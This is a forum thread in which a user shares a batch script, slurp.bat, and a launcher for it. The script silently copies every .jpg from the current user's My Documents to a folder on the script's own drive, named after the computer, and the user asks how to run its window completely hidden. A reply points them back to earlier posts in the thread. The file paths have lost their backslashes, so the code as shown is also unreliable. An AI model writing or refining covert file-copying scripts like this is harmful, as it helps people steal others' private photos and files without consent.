Jump to content

cmd to exe


atomic

Recommended Posts

That's great i add at the first line tha explorer trick and it was ok.

But now i need to run the cmd window completely hidden.

It starts as minimized.

explorer .....

@echo off

@start /min slurp.bat /B

@exit

Here is the slurp.bat

@echo off

mkdir %~d0%computername%

xcopy "C:Documents and Settings%username%My Documents*.jpg" %~d0%computername% /s/c/q/r/h

@cls

@exit

Any idea?

Link to comment
Share on other sites

That's great i add at the first line tha explorer trick and it was ok.

But now i need to run the cmd window completely hidden.

It starts as minimized.

explorer .....

@echo off

@start /min slurp.bat /B

@exit

Here is the slurp.bat

@echo off

mkdir %~d0%computername%

xcopy "C:Documents and Settings%username%My Documents*.jpg" %~d0%computername% /s/c/q/r/h

@cls

@exit

Any idea?

Did you bother to read this thread? There are two easy ways to do this go back and read the thread before asking stupid questions! If you have a specific question about how to do it that hasn't already been covered in this thread then we will help you.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...